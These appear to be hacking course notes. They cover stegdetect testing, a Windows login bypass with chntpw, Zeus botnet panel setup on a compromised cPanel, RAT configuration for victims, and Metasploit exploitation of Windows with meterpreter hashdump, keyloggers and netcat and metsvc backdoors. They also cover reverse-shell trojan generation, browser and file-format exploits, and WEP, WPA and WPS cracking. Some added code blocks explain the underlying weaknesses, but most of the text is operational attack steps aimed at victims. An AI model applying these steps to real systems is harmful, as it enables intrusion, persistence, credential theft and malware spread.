stegdetect -s[number] steg.jpg - setting sensitivity
Actually stegdetect found jphide for the original and the created image as well, so it's clearly a
false positive.
I tried to see what stegbreak can do, and created a list of password where I put only one line, the
correct password.
stegbreak -f passlist.txt steg.jpg
I got the following error: "stegbreak: fopen: /usr/local/share/stegbreak/rules.ini: No such file or
directory"
I downloaded the source and placed the ini file in the said location, but you can also download it
from here.
After that I got a "Segmentation fault" error. I couldn't find a working solution for this problem,
however it's a known bug.
Second I tried outguess, which can hide info in jpeg files.
Using Outguess :
apt-get install outguess
outguess -k "mypass" -d index.html IMG_4422.JPG out2.jpg - hides index.html in
IMG_4422.JPG
Unfortunately stegdetect doesn't detect the hidden file (probably because I used outguess v2),
even if increasing the sensitivity, as you can see:
My last try was with jphide, I used the windows version, as had no luck with installing the one
for Linux. It can be downloaded from here.
As you can see stegdetect can detect it, when increasing sensitivity, but as it claims the same
thing for the original image, so...
stegcompare can compare the original and the image which stores information, but I couldn't
figure out what the output means.
stegdeimage - not sure about what it should do, also gives the following error:
"/home/stego_analysis/compress/dscf0033.jpg : error: No such file or directory"
looking at the source code:
if (jpg_open("/home/stego_analysis/compress/dscf0033.jpg") == -1)
return;
it is clear that it will never run, unless you have such an image.
Overall I'm not really convinced by the stegdetect toolset, it's buggy, and doesn't really find
steganography correctly.
Official website for steghide: http://steghide.sourceforge.net/
Official website for stegdetect and outguess: http://www.outguess.org/
Official website for jphide: http://linux01.gwdg.de/~alatham/stego.html
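The `copy /b image.jpg+password.txt` trick in section 4 and stegdetect's `a` test above both concern data appended after the end of a JPEG. The Python below is an added example written for these notes (it is not part of stegdetect, steghide or the quoted blog post): it walks the JPEG marker structure to find the structural EOI marker and returns whatever follows it, which a naive search for the last FF D9 gets wrong when the appended data itself contains that byte pair. The sample JPEG is a constructed minimal container, not a real picture.

```python
SOI, EOI = b"\xff\xd8", b"\xff\xd9"


def build_sample_jpeg() -> bytes:
    """Constructed minimal JPEG container (SOI, APP0/JFIF, SOS with a few bytes of
    scan data, EOI). Structurally valid, but not a viewable picture."""
    app0 = b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\x56"
    return SOI + app0 + sos + scan + EOI


def jpeg_end_offset(blob: bytes) -> int:
    """Walk the marker structure and return the offset just past the EOI marker.
    Scan data is skipped byte by byte, honouring FF00 stuffing and RSTn markers,
    so an FF D9 inside appended data is never mistaken for the real end of image."""
    if blob[:2] != SOI:
        raise ValueError("missing SOI marker: not a JPEG")
    n, pos = len(blob), 2
    while pos + 1 < n:
        if blob[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = blob[pos + 1]
        if marker == 0xFF:          # fill byte before a marker
            pos += 1
            continue
        pos += 2
        if marker == 0xD9:          # EOI: the structural end of the image
            return pos
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:
            continue                # standalone markers carry no length field
        if pos + 2 > n:
            raise ValueError("truncated segment header")
        pos += int.from_bytes(blob[pos:pos + 2], "big")   # length includes itself
        if marker == 0xDA:          # SOS: entropy-coded data follows the header
            while pos + 1 < n:
                nxt = blob[pos + 1]
                if blob[pos] == 0xFF and nxt not in (0x00, 0xFF) and not 0xD0 <= nxt <= 0xD7:
                    break           # a real marker ends the scan
                pos += 1
    raise ValueError("no EOI marker found")


def find_appended_data(blob: bytes) -> bytes:
    """Return whatever follows the structural end of image; b'' for a clean file."""
    return blob[jpeg_end_offset(blob):]


if __name__ == "__main__":
    # What `copy /b image.jpg+password.txt` produces: the text simply follows EOI.
    tampered = build_sample_jpeg() + b"password123\n"
    tail = find_appended_data(tampered)
    print(f"{len(tail)} trailing byte(s) after EOI: {tail!r}")
```

Run against a directory of images, a non-empty return value is the same signal stegdetect's `a` test reports; the parser raises on files that are not JPEGs or are truncated, so those should be triaged separately rather than treated as clean.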
Stegdetect :
Steghide :
stegcompare :
outguess :
6. Bypassing Login Page Windows With Backtrack
Make a bootable backtrack pendrive
Boot the system and open backtrack
Open Terminal
mkdir /root/Desktop/p7771 [ Create any folder ]
fdisk -l
mount /dev/sda2 /root/Desktop/p7771 [ Mount Your windows C-Drive ]
ls -la /root/Desktop/p7771/
cd /pentest/password/chntpw
./chntpw -i Desktop/p7771/Windows/System32/config/sam
Press - 1 [ Edit User Data And Password ]
Press - 1 [ Clear Blank User Password ]
Press - q [ Quit ]
Press - y [ Write hive file ? ]
Malwares 1. Botnet I ] How To Find Cpanel :
A] we need a compromised website with Symlink attack eg :
link:www.site.com/akismet/configweb [ it has all password files ]
1] python cracker.py http://www.pjmi.net/wp-content/plugins/akismet/configweb/
'/root/Desktop/ab' [ copy all password to ab folder from compromised Symlink website ]
2] upload cpanel.php to your shell.
3] copy all password to your cpanel.php
4] run command on your previous shell "eg: wso.php" for user name ---> ls /var/mail
5] copy all user to your cpanel.php
6] click on start it will show you list of active cpanel
7] find website from reverse ip lookup
8] default port for cpanel :2082 [ www.site.com:2082 ]
II ] Configuring Zeus Botnet :
A ] Creating IRC Server :
1] open c-panel
2] go into public folder
3] create folder [ Eg : XXX ]
4] upload your IRC scripts [Zeus.rar in your cpanal to make your cpanal an IRC
Server ]
5] extract the Zeus.rar to server.
6] open www.site.com/XXX/install/index.php
NOW : Now we will setup a database and link it with our IRC server.
B ] Creating Database :
7] go into cpanel & click into my sql database wizard
8] create a new database and user
Eg : Yahoo >> Next
Eg : User Name = yahoo
Eg : Password = Click on " Generate Password " [ Copy/Remember [ User Name & Password ]
9] Click on create user.
10] Go to = www.site.com/XXX/install/index.php
> give password that has been generated.
11] Come back to your database page and assign/give permission or click on all
privileges.
12] Copy username & database name and go to -->
www.site.com/XXX/install/index.php [ Under Mysql Server ]
> give the user name.
> give the database name.
13] Click on next step [ Database will be created and linked with IRC server ]
14] Now for login in botnet panel we have to give : password [ Eg:abc123 ]in -->
www.site.com/XXX/install/index.php [ Under Root User ] [ By default user will be "admin" ]
15] Now create encryption key Eg : 123123 [ Under Options : ]
16] Before Pressing " install " [ In www.site.com/XXX/install/index.php ] go
back to your folder " XXX " [ Where you have uploaded your IRC ]
> Right click on --> system [ Folder ]
> Change Permission to --> 777 [Read-Write-Execute]
17] Go back to control panel [ www.site.com/XXX/install/index.php ] Press "
Install "
18] Now go to --> www.site.com/XXX/cp.php
> Username = admin
> Password = abc123
C ] Configuring Bot :
19] Open & Extract "client.rar" .
20] Run "gzero.exe"
21] Click On Builder > click on " edit ".
> configuration file of bot will be opened.
> replace all links with your server path -- > www.site.com/XXX/
> Eg. http://www.rumahbaut.com/xxx/cfg.bin ----->
http://www.site.com/xxx/cfg.bin
> Eg. http://www.rumahbaut.com/xxx/tr.exe ------>
http://www.site.com/xxx/tr.exe
> Eg. http://www.rumahbaut.com/xxx/gate.php --->
http://www.site.com/xxx/gate.php
> Eg. http://www.rumahbaut.com/xxx/cfg1.bin ----->
http://www.site.com/xxx/cfg1.bin
> Eg. Encryption key = 1221421412 ------> Your encryption key [ 12312]
22] Click on " BUILD THE BOT CONFIGURATION " name Eg. BOT
Then ,
23] Click on " BUILD THE BOT EXECUTABLE " name Eg. tr.exe
D] Uploading The Bot :
24] Go to your IRC server folder where u uploaded & Extracted your zeus.rar file
[ www.site.com/ ]
25] Upload Both file that u have created "BOT" & "tr.exe"
NOTE : If doesn't UPLOAD : Try to compress and upload OR UPLOAD Both bot from your
shell. [wso.php]
2. Virus Virus Creator
Sonic Bat
TeraBit
Infection Virus Maker
Deadline Virus Maker
JPS Virus Maker
Jkymmel Batch Virus Creator
WolfDEM's
Virus Matic
Necro Virus Maker
3. Trojans [ Top Ten RAT ( Remote Administrative Tools ) ] Dark Comet [ Setting Up Dark Comet RAT ]
1. Run client.exe
> allow connection
> Edit Server
> main setting
> connection setting
> Ip: Get local IP < Your IP>
> port : <any>
> Server Setup
> melt server
> Server Shield
> Anti Virtual Box
> Icon Setting
> Generate Server
> active keylogger
> create server
> click on connection.
> port listening mode
2. Give app to victim
3. Control Its PC
Black Shades
JSpy
Pussy RAT
Bozok RAT
Poison Ivy RAT
Nj Rat
DameWare RAT
jRAT
Cyber Gate
4. Worms
A worm is similar to a virus by design and is considered to be a sub-class of a virus. Worms
spread from computer to computer, but unlike a virus, it has the capability to travel without any
human action. A worm takes advantage of file or information transport features on your system,
which is what allows it to travel unaided.
The biggest danger with a worm is its capability to replicate itself on your system, so rather than
your computer sending out a single worm, it could send out hundreds or thousands of copies of
itself, creating a huge devastating effect. One example would be for a worm to send a copy of
itself to everyone listed in your e-mail address book. Then, the worm replicates and sends itself
out to everyone listed in each of the receiver's address book, and the manifest continues on down
the line.
Due to the copying nature of a worm and its capability to travel across networks the end result in
most cases is that the worm consumes too much system memory (or network bandwidth),
causing Web servers, network servers and individual computers to stop responding. In recent
worm attacks such as the much-talked-about Blaster Worm, the worm has been designed to
tunnel into your system and allow malicious users to control your computer remotely.
Penetration testing Types Of Testing :
1. White-Box Testing
2. Black-Box Testing
3. Grey-Box Testing
4. Internal Testing
5. External Testing
Process Of Pen-testing :
1. Information gathering
2. Scanning & Banner Grabbing
3. Vulnerability Scanning
4. Exploitation ( Obtaining Access )
5. Maintaining Access & Erasing Evidence
Tools :
1. Metasploit
2. Core-impact
METASPLOIT
Vulnerability : A weakness that allows an attacker to compromise the security of a
system.
Exploits : Doing the step by step procedure of gathering information
Payload : the process to gain access which is blocked by user
Encoders : The process to remove tracks.
Need for Metasploit
1. difficult to manage, update, customize dozen of exploits available on internet for
different technologies
2. customization of exploits will be time consuming & one also needs high skills to do
the same
METASPLOIT
Testing framework for penetration testing; contains 1300+ exploits
http://cve.mitre.org
rapid7.com
www.exploit-db.com
I. Windows XP
To open Metasploit in Kali Linux or BackTrack use command : msfconsole
RCE ( Netapi ) ( Remote Code Execution ) [ Win XP SP2, SP3 without the MS08-067 patch -> vulnerable OS ]
msfconsole
search netapi
use exploit/windows/smb/ms08_067_netapi [ bulletin MS08-067, CVE-2008-4250 ]
show options
set RHOST [TARGET IP] -> 192.168.1.20
set PAYLOAD windows/meterpreter/bind_tcp [ attacker connects to a port the payload opens on the target ]
OR
set PAYLOAD windows/meterpreter/reverse_tcp [ target connects back to LHOST ; test other payloads also ]
set LHOST [MY IP ADDRESS] -> 192.168.1.150 [ needed only for reverse payloads ]
exploit
So we got a successful meterpreter session; it means you are remotely logged in to the XP OS.
Now use the help command to list meterpreter commands.
Meterpreter Commands
meterpreter > getuid [ which user the session runs as ]
meterpreter > ps [ list processes with PID and owner ]
meterpreter > migrate 1444 [ migrate into a PID from ps that runs as SYSTEM or an admin, so the session survives if the exploited process dies ]
meterpreter > idletime [ how long the user has been idle ]
meterpreter > hashdump [ dump the SAM password hashes ; needs SYSTEM ]
meterpreter > screenshot
meterpreter > shell
c:\> net user root * [ prompts for a new password for the account root ; add /add to create the account ]
c:\> exit
Uploading Netcat :
meterpreter > upload /pentest/windows-binaries/tools/nc.exe c:\\WINDOWS\\SYSTEM32\\
[ on Kali the binary is at /usr/share/windows-binaries/nc.exe ]
meterpreter > reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run
meterpreter > reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run -v NETCAT -d 'C:\WINDOWS\system32\nc.exe -L -d -p 1234 -e cmd.exe'
meterpreter > reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run [ check that the NETCAT value is there ]
[ -L : keep listening after a client disconnects, -d : detach from the console, -p 1234 : listen port, -e cmd.exe : hand the connection to a shell ]
Note : Netcat can be installed this way on Win XP, Vista and 7. Once netcat is installed on the victim
OS there is no need to exploit again : the Run key starts the listener at the next logon and you connect with :
root@bt:~# nc <victim ip> <port>
root@bt:~# nc 192.168.217.141 1234
More Commands :
meterpreter > cat <file name>
meterpreter > download C:\\<file name>
meterpreter > upload <local file> C:\\<file name>
meterpreter > search -d C:\\ -f <pattern>
meterpreter > keyscan_start [ start the keylogger inside the current process ]
meterpreter > keyscan_dump [ show the keystrokes captured so far ]
meterpreter > keyscan_stop
meterpreter > uictl disable keyboard
meterpreter > uictl enable keyboard
meterpreter > run [ press tab to show the available scripts ]
meterpreter > run vnc
Creating Backdoor :
meterpreter > run metsvc [ installs a Meterpreter service on the victim that listens on port 31337 by default ]
meterpreter > background [ go back to the msf prompt, keeping the session open ]
NOTE : What if our connection breaks, or the victim patches the vulnerability? Reconnect to our
"Backdoor" ( the metsvc service ) without exploiting again :-
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
show options
set RHOST < victim >
set LPORT 31337 ---------> because our backdoor is listening on port 31337.
exploit
meterpreter >
II. Windows Server 2003
Windows Server Hacking [ 2003 SP1, SP2 ]
RCE ( Netapi ) ( Remote Code Execution ) [ MS06-040, CVE-2006-3439 : unpatched Windows Server 2003 up to SP1 ;
Server 2003 SP2 is not affected by MS06-040, use ms08_067_netapi as in the XP section for it ]
msfconsole
use exploit/windows/smb/ms06_040_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [MY IP ADDRESS]
set RHOST [TARGET IP]
exploit
III. Windows 7
Windows 7 Hacking
(dot)EXE [ Trojan ] [ works on any Windows OS that runs the file ; no vulnerability is needed ]
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.17.128 LPORT=4444 X > /root/12345.exe
[ msfpayload was removed from Metasploit in 2015 ; the same file with msfvenom :
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.17.128 LPORT=4444 -f exe -o /root/12345.exe ]
NOTE : Give 12345.exe [ virus ] to the victim. It connects back to LHOST:LPORT when run, so start the handler first :
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST < Our Ip >
set LPORT 4444 ---------> because our virus connects back to port 4444
exploit
meterpreter >
IV. Browser Exploits Autopwn [ combination of many browser exploits ] [ See also : exploit/multi/browser/java_jre17_jmxbean ]
use auxiliary/server/browser_autopwn
show options
set LHOST <My Ip >
set SRVHOST < My Ip ; the malicious web server is hosted on my computer >
set SRVPORT 80
set URIPATH /
exploit
Note : the victim has to open http://<My Ip>/ in a browser ; autopwn fingerprints the browser and its
plugins, fires the matching exploits and starts a handler for each payload on LHOST.
V. Aurora Exploit [ MS10-002, CVE-2010-0249 : Internet Explorer ]
msf > use exploit/windows/browser/ms10_002_aurora
msf > show options
msf > set URIPATH /
msf > show payloads
msf > set PAYLOAD windows/vncinject/reverse_tcp
msf > show options
msf > set LHOST 192.168.17.128
msf > exploit
Note : the victim opens the URL the module prints, here http://192.168.42.131/ ; the exploit runs
in the browser and the payload connects back to LHOST with a VNC session.
VI. Windows 8
Same trojan method as Windows 7 : no service exploit is used, the user has to run the file.
Attacker :
1. start terminal
2. root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.17.128 LPORT=4444 X > /root/12345.exe
Now give this 12345.exe <- virus to the victim. Then run :
root@bt:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
msf exploit(handler) > set LHOST 192.168.17.128
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
VII. DLL Injection [ MS10-046, CVE-2010-2568 : the Windows shell loads a DLL named by a crafted .LNK shortcut icon ]
1. Hack Windows 7 with Metasploit using Kali Linux.
Machine 1: Host Kali Linux Machine
Machine 2: Target Windows 7 Machine
msfconsole
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > show options
msf > set SRVHOST 192.168.31.20
msf > set LHOST 192.168.31.20
msf > exploit
[ the module serves a WebDAV share ; when the victim opens it in Explorer the shortcut's icon handler loads the DLL and the payload runs ]
msf > sessions
msf > sessions -i 1
meterpreter >
Buffer Overflow
A heap overflow demo : name and command are two malloc'd buffers that end up next to each other.
gets() puts no limit on the input, so a name longer than the gap between the two buffers runs into
command, and system(command) then executes whatever the attacker typed after the filler.
#include <stdio.h>
#include <stdlib.h>   /* malloc, system */
int main(void)
{
char *name;
char *command;
name = (char *)malloc(10);
command = (char *)malloc(128);
printf("address of name is : %p\n", (void *)name);
printf("address of command is : %p\n", (void *)command);
printf("Difference between address is : %td\n", command - name);
printf("Enter your name : ");
gets(name);   /* intentionally unbounded : this is the overflow */
printf("Hello %s\n", name);
system(command);
return 0;
}
root@kali:~# gcc buffer.c -o buffer [ gcc warns that gets() is dangerous ; it was removed from C11 and is used here on purpose ]
root@kali:~# ./buffer
Eg: Input : 347582347y5823458723453425534523453452345234cat /etc/passwd
The filler must be exactly as long as the printed difference so that the command text starts at
command[0] ; the program then prints the "name" and runs cat /etc/passwd. The difference depends on
the allocator ( on 64-bit glibc malloc(10) is rounded up to a 32-byte chunk ), which is why the
program prints it first.
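The overflow above, as an added example that is not from the original notes : the same two adjacent buffers, but placed back to back in a struct so the gap is fixed, with the gets()-style unbounded copy next to a bounded copy that closes the hole. Nothing is executed ; each reader returns the command that system() would have been given. NAME_LEN, the filler and the default command "echo benign" are constructed values for the demo.

```c
/* Added example, not from the original notes: the overflow in buffer.c made
 * deterministic and testable.  Instead of two malloc'd blocks whose distance
 * depends on the allocator, name and command sit back to back in a struct, so
 * the gap is always NAME_LEN bytes.  read_name_unsafe() copies like gets():
 * it trusts the input length, so input longer than NAME_LEN spills into
 * command.  read_name_safe() is the fix: bounded copy, always NUL-terminated.
 * Nothing here calls system(); the functions return the command that would
 * have been executed.  Inputs are kept shorter than the struct on purpose. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NAME_LEN 16
#define CMD_LEN  128

struct form {
    char name[NAME_LEN];    /* attacker-controlled input lands here */
    char command[CMD_LEN];  /* what system() would run afterwards */
};

/* Vulnerable: like gets()/strcpy(), copies the whole input regardless of size. */
static void read_name_unsafe(struct form *f, const char *input)
{
    /* Written through a pointer to the enclosing struct so the demo behaves the
     * same under compiler fortification; the defect is identical: the copy
     * length comes from the input, not from sizeof f->name. */
    memcpy((char *)f + offsetof(struct form, name), input, strlen(input) + 1);
}

/* Hardened: never writes past name and always terminates it. */
static void read_name_safe(struct form *f, const char *input)
{
    strncpy(f->name, input, NAME_LEN - 1);
    f->name[NAME_LEN - 1] = '\0';
}

/* Feeds one input through the chosen reader and copies the resulting command
 * (the string system() would get) into out, which must hold CMD_LEN bytes. */
const char *command_after_input(const char *input, int safe, char *out)
{
    struct form f;
    memset(&f, 0, sizeof f);
    strcpy(f.command, "echo benign");   /* constructed: the command the program meant to run */
    if (safe)
        read_name_safe(&f, input);
    else
        read_name_unsafe(&f, input);
    memcpy(out, f.command, CMD_LEN);
    out[CMD_LEN - 1] = '\0';
    return out;
}

/* Attacker input as in the notes: filler exactly as long as the gap between
 * the two buffers, then the command that should land at command[0]. */
void build_overflow_input(char *buf, size_t buflen, const char *cmd)
{
    memset(buf, 'A', NAME_LEN);
    snprintf(buf + NAME_LEN, buflen - NAME_LEN, "%s", cmd);
}

/* 1 if the unbounded reader let the attacker replace the command. */
int unsafe_reader_is_hijacked(void)
{
    char input[256], out[CMD_LEN];
    build_overflow_input(input, sizeof input, "cat /etc/passwd");
    return strcmp(command_after_input(input, 0, out), "cat /etc/passwd") == 0;
}

/* 1 if the bounded reader kept the original command despite the same input. */
int safe_reader_keeps_command(void)
{
    char input[256], out[CMD_LEN];
    build_overflow_input(input, sizeof input, "cat /etc/passwd");
    return strcmp(command_after_input(input, 1, out), "echo benign") == 0;
}

int main(void)
{
    char input[256], out[CMD_LEN];
    build_overflow_input(input, sizeof input, "cat /etc/passwd");
    printf("unsafe reader: system(\"%s\")\n", command_after_input(input, 0, out));
    printf("safe reader:   system(\"%s\")\n", command_after_input(input, 1, out));
    return 0;
}
```

The struct layout removes the allocator guesswork that buffer.c works around by printing the address difference ; the principle is the same, a copy whose length is chosen by the sender, not by the receiver's buffer size. The bounded reader also shows the usual strncpy trap : it does not terminate the string on truncation, so the last byte is set by hand.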
1] Buffer Over Flow Attack On Orbital Viewer [ client-side file-format exploit : the malicious .orb file overflows a buffer when opened ]
msfconsole
search bof
search orbital
use exploit/windows/fileformat/orbital_viewer_orb
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST <Our IP>
exploit [ writes msf.orb under ~/.msf4/local/ ]
exit
Note : Give " msf.orb " to the victim now, and start the handler before it is opened :
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST < Our Ip >
set LPORT 4444 ---------> because the payload inside msf.orb was generated with the default LPORT 4444
exploit
meterpreter >
II. Buffer Overflow In VLC Player [ ModPlug .s3m demuxer overflow, CVE-2011-1574 ]
use exploit/windows/fileformat/vlc_modplug_s3m
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST <Our IP>
exploit [ writes msf.s3m under ~/.msf4/local/ ]
exit
Note : Give " msf.s3m " to the victim now, and start the handler before it is opened :
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST < Our Ip >
set LPORT 4444 ---------> because the payload inside msf.s3m was generated with the default LPORT 4444
exploit
meterpreter >
Wi-Fi Hacking http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver
1. WEP / WPA / WPA-2
WEP - Wired Equivalent Privacy
WEP keys are a sequence of hexadecimal digits.
These digits include the numbers 0-9 and the letters A-F.
Some examples of WEP keys are:
1A648C9FE2
99D767BAC38EA23B0C0176D152
The length of a WEP key depends on the type of WEP security (called "encryption") used. The
advertised size counts the 24-bit IV that is sent in clear with every frame, so the secret part is
24 bits shorter :
40- or 64-bit WEP: 10 hex digit key ( 40 secret bits )
104- or 128-bit WEP: 26 hex digit key ( 104 secret bits )
232- or 256-bit WEP: 58 hex digit key ( 232 secret bits )
WEP encrypts each frame with RC4 keyed by IV + key. The IV space is so small that keystreams
repeat, which is why the cracking steps below need thousands of captured packets.
WPA-PSK - Wi-Fi Protected Access ( Pre-Shared Key )
The master key used by WPA is 256 bits, a significant increase over the 64-bit and 128-bit keys
used in the WEP system. It is derived from the passphrase and the SSID, so a weak passphrase can
still be cracked offline from a captured handshake.
Temporal Key Integrity Protocol - TKIP
TKIP uses a per-packet key, far more secure than the fixed key used in the WEP system, while still
running on WEP-era RC4 hardware.
TKIP was later superseded by AES ( CCMP ).
WPA2 - Wi-Fi Protected Access II
AES-CCMP encryption with keys derived from the 256-bit master key,
entered as a security key of either 64 hexadecimal digits ( the master key itself ) or a passphrase
of 8 to 63 ASCII characters.
2. Command Line
airmon-ng -> To put your network adapter in monitor mode ( creates the mon0 interface ).
airodump-ng -> Start monitoring and packet sniffing, write the capture to a file.
aireplay-ng -> To deauthenticate a client ( forces a reconnect, which generates traffic and a new handshake ).
aircrack-ng -> To crack the key from the capture file.
SSID - Service Set Identifier ( name of the network )
BSSID - Basic Service Set Identifier -> identifies one access point and its clients
( the AP's MAC address )
Hacking WEP From Backtrack Linux Terminal
step1 : airmon-ng start wlan0 --> creates the monitor interface mon0
step2 : airodump-ng mon0 --> note the target's BSSID, channel ( CH ) and a connected STATION
step3 : airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w lab mon0 --> capture channel 12 to lab-01.cap ; wait for at least 5000
packets in the #Data column ( unique IVs )
step4 : aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0 --> 500 deauth frames ; the client reconnects and sends
traffic ( on a quiet network replay the captured ARP frames with aireplay-ng -3 to collect IVs faster )
For Kali Linux : aireplay-ng -c <STATION or Client> -0 500 -a 0C:D2:B5:01:AB:70 mon0 --
ignore-negative-one
step5 : aircrack-ng lab-01.cap --> statistical ( PTW ) key recovery from the captured IVs ; airodump-ng adds -01 to the file name
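Why step3 has to wait for thousands of packets, as an added example that is not from the original notes : WEP keys every frame with RC4(IV + key) and sends the 24-bit IV in clear, so two frames that reuse an IV share a keystream, and known plaintext in one of them ( the fixed LLC/SNAP header of an ARP frame ) decrypts the other without the key. The example uses the 40-bit key 1A648C9FE2 from the list above ; the IV and frame contents are constructed, the key-index byte and the CRC-32 ICV are omitted, and the statistical key recovery that aircrack-ng performs on top of this weakness is not shown.

```c
/* Added example, not from the original notes: the IV-reuse weakness behind
 * the "wait for 5000 packets" step.  WEP encrypts each frame with RC4 keyed
 * by IV || key, with the 24-bit IV sent in clear in front of the ciphertext.
 * Two frames under the same IV use the same keystream; XORing their
 * ciphertexts gives the XOR of their plaintexts, and known plaintext in one
 * frame yields the keystream for the other.  Key, IV and frames below are
 * constructed for the demo; key-index byte and CRC-32 ICV are omitted. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Plain RC4 keystream generator; WEP uses RC4 unmodified. */
static void rc4_keystream(const uint8_t *key, size_t keylen, uint8_t *out, size_t n)
{
    uint8_t S[256], j = 0, a = 0, t;
    size_t i;
    for (i = 0; i < 256; i++) S[i] = (uint8_t)i;
    for (i = 0; i < 256; i++) {                 /* key scheduling */
        j = (uint8_t)(j + S[i] + key[i % keylen]);
        t = S[i]; S[i] = S[j]; S[j] = t;
    }
    j = 0;
    for (i = 0; i < n; i++) {                   /* PRGA */
        a++;
        j = (uint8_t)(j + S[a]);
        t = S[a]; S[a] = S[j]; S[j] = t;
        out[i] = S[(uint8_t)(S[a] + S[j])];
    }
}

/* Encrypts one frame body: 3-byte IV in clear, then plaintext XOR RC4(IV||key).
 * Returns the frame length, or 0 if key or frame is too long for the demo. */
size_t wep_encrypt(const uint8_t iv[3], const uint8_t *key, size_t keylen,
                   const uint8_t *pt, size_t n, uint8_t *frame)
{
    uint8_t seed[3 + 13], ks[256];              /* keys up to 104 bits */
    size_t i;
    if (keylen > 13 || n > sizeof ks) return 0;
    memcpy(seed, iv, 3);
    memcpy(seed + 3, key, keylen);
    rc4_keystream(seed, 3 + keylen, ks, n);
    memcpy(frame, iv, 3);
    for (i = 0; i < n; i++) frame[3 + i] = pt[i] ^ ks[i];
    return 3 + n;
}

/* Attacker side: f1 and f2 were captured with the same IV and the plaintext of
 * f1 is known.  Writes f2's plaintext to out and returns 1, or returns 0 when
 * the IVs differ or f2 is longer than the keystream recovered from f1. */
int wep_recover_with_iv_reuse(const uint8_t *f1, size_t n1, const uint8_t *known_pt1,
                              const uint8_t *f2, size_t n2, uint8_t *out)
{
    size_t i;
    if (n1 < 3 || n2 < 3 || memcmp(f1, f2, 3) != 0 || n2 > n1) return 0;
    for (i = 0; i < n2 - 3; i++)
        out[i] = f2[3 + i] ^ (f1[3 + i] ^ known_pt1[i]);  /* c2 XOR keystream */
    return 1;
}

/* The 40-bit example key 1A648C9FE2 from the notes. */
static const uint8_t demo_key[5] = {0x1A, 0x64, 0x8C, 0x9F, 0xE2};
/* Frame 1: LLC/SNAP header plus ARP ethertype, plaintext any sniffer can
 * predict.  Frame 2: the secret the attacker wants.  Both constructed. */
static const uint8_t demo_pt1[] = {0xAA,0xAA,0x03,0x00,0x00,0x00,0x08,0x06,0x00,0x01,0x08,0x00};
static const uint8_t demo_pt2[] = "secret text";   /* 12 bytes incl. NUL */

/* Same IV on both frames: recovery succeeds, returns 1. */
int demo_iv_reuse(void)
{
    static const uint8_t iv[3] = {0x12, 0x34, 0x56};
    uint8_t f1[64], f2[64], rec[64];
    size_t n1 = wep_encrypt(iv, demo_key, sizeof demo_key, demo_pt1, sizeof demo_pt1, f1);
    size_t n2 = wep_encrypt(iv, demo_key, sizeof demo_key, demo_pt2, sizeof demo_pt2, f2);
    if (!wep_recover_with_iv_reuse(f1, n1, demo_pt1, f2, n2, rec)) return 0;
    return memcmp(rec, demo_pt2, sizeof demo_pt2) == 0;
}

/* Fresh IV on the second frame: keystreams differ, the attack refuses (0). */
int demo_fresh_iv(void)
{
    static const uint8_t iv1[3] = {0x12, 0x34, 0x56}, iv2[3] = {0x12, 0x34, 0x57};
    uint8_t f1[64], f2[64], rec[64];
    size_t n1 = wep_encrypt(iv1, demo_key, sizeof demo_key, demo_pt1, sizeof demo_pt1, f1);
    size_t n2 = wep_encrypt(iv2, demo_key, sizeof demo_key, demo_pt2, sizeof demo_pt2, f2);
    return wep_recover_with_iv_reuse(f1, n1, demo_pt1, f2, n2, rec);
}

int main(void)
{
    printf("same IV, known plaintext in frame 1: %s\n", demo_iv_reuse() ? "frame 2 recovered" : "failed");
    printf("different IV: %s\n", demo_fresh_iv() ? "recovered" : "nothing to XOR against");
    return 0;
}
```

With 2^24 IVs a busy access point repeats one within hours, and many drivers start from IV 0 at boot, so collisions arrive much sooner than the birthday bound suggests ; that is the traffic airodump-ng counts in #Data, and the more IVs captured, the faster aircrack-ng's key recovery converges.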
Hacking WPA & WPA2 From Backtrack Linux Terminal
step1 : airmon-ng start wlan0
step2 : airodump-ng mon0
step3 : airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w lab mon0
step4 : aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0 --> the deauthenticated client reconnects and
performs a new 4-way handshake
> wait for at least one 4-way handshake ( airodump-ng shows "WPA handshake:" in its top line )
> > For Kali Linux : aireplay-ng -c <STATION or client> -0 500 -a 0C:D2:B5:01:AB:70
mon0 --ignore-negative-one
step5 : aircrack-ng -w wordlist lab-01.cap --> offline dictionary attack ; each candidate passphrase costs a
PBKDF2 derivation, so only a passphrase present in the wordlist will be found
Hacking WPS From Backtrack Linux Terminal
Reaver : [ brute-forces the 8-digit WPS PIN ( split into two halves, so about 11,000 tries ) ; once the PIN is found the
AP hands over the WPA / WPA2 passphrase itself. WEP networks are not affected, WPS is a WPA-era feature ]
wash -i mon0
[ to see whether WPS is enabled ( it has to be ) and not locked : the "WPS Locked" column must say No ]
